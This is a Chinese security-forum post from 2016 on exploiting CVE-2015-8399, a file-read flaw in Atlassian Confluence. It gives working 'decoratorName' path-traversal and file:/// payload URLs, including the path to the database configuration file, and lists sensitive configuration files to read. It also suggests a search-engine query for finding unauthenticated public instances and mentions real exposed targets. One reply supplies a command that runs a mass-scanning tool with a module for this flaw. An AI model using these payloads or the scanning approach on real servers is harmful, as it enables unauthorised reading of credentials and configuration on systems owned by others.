有关Atlassian Confluence信息泄露漏洞的尝试

描述：
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件，也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。

Atlassian Confluence 5.8.17之前版本中存在安全，该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件没有充分过滤'decoratorName'参数。远程攻击者可利用该漏洞读取配置文件。

以上内容：
http://www.cnnvd.org.cn/vulnerability/show/cv_id/2016010311
参考：
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8399

恰好之前本地有一套Confluence的环境，于是就测试了一番：

默认情况下，访问spaces/viewdefaultdecorator.action是需要一个用户登录的；
admin/viewdefaultdecorator.action 特么还需要是管理员登录，特么都管理员，我们就不搞读文件了。

本地验证：
1. decoratorName= 什么都没有

这个时候访问的是：
\Atlassian\Confluence\confluence\WEB-INF\classes
2. decoratorName=.
/spaces/viewdefaultdecorator.action?decoratorName=.

这时候访问的是：
\Atlassian\Confluence\lib
3. decoratorName=../../

Atlassian\Confluence\confluence  网页程序目录
根据CVE的描述，
远程攻击者可利用该漏洞读取配置文件，比如WEB-INF/web.xml

看上面../../都可以跳目录了.

4. decoratorName=../../../

报错了。
..//..// ../..//../ 尝试了都没有出去别的目录。

不会真的如https://www.exploit-db.com/exploits/39170/
所说，只能读读配置文件吧：
/WEB-INF/decorators.xml
/WEB-INF/glue-config.xml
/WEB-INF/server-config.wsdd
/WEB-INF/sitemesh.xml
/WEB-INF/urlrewrite.xml
/WEB-INF/web.xml
/databaseSubsystemContext.xml
/securityContext.xml
/services/statusServiceContext.xml
com/atlassian/confluence/security/SpacePermission.hbm.xml
com/atlassian/confluence/user/OSUUser.hbm.xml
com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
com/atlassian/confluence/user/ConfluenceUser.hbm.xml

其实在本地的环境验证发现还可以使用file
5. decoratorName=file:///c:/  我本地环境是windows

数据库的配置文件：
http://ip:28090/spaces/viewdefaultdecorator.action?decoratorName=file:///d:/Atlassian/Application Data/Confluence/confluence.cfg.xml


在搜索引擎搜索 “Powered by Atlassian Confluence 面板”
还是可以找到不需要登录的，比如：
某个叫上市公司的某个部门

某个办公软件的厂商的测试环境


附注：linux环境由于运行用户权限的限制，不是root，读取不了某些文件的。

本地测试的环境Atlassian Confluence 5.1.4 windows server 2003

最后还是那一句：
本人不仅菜，而且还脸皮厚，还请大牛不吝指正。

收藏 感谢(0)

分享到： 0

7 个回复

1. 
   1# 纷纭 (:-)) | 2016-05-07 17:01

   66666666~

2. 
   2# _Thorns (舍就是得。) | 2016-05-07 18:25

   66666666~

3. 
   3# xyntax | 2016-05-07 18:26

   赞！POC已加入全家桶
   有的站可以file:///读文件，这样危害就大了
   
   
   
   git clone https://github.com/Xyntax/POC-T.git

python POC-T.py -T -m confluence-file-read -f [path/targetfile] -t [thread-num]

4. 
   4# f4ckbaidu (<wtf>) | 2016-05-07 18:28

   66666666

5. 
   5# Sura、Rain | 2016-05-07 18:33

   很赞

6. 
   6#

   回复此人 感谢

   刺刺 | 2016-05-07 18:56

   这个系统估计在内网会比较多一点。

7. 
   7# obanions | 2016-05-07 21:19

   你这是登录以后读的吧？

8. 
   _Evil () | 2016-05-08 00:11

   666

9. 
   _Evil () | 2016-05-08 00:12

   昨天遇到Jenkens和Rails框架的Rendme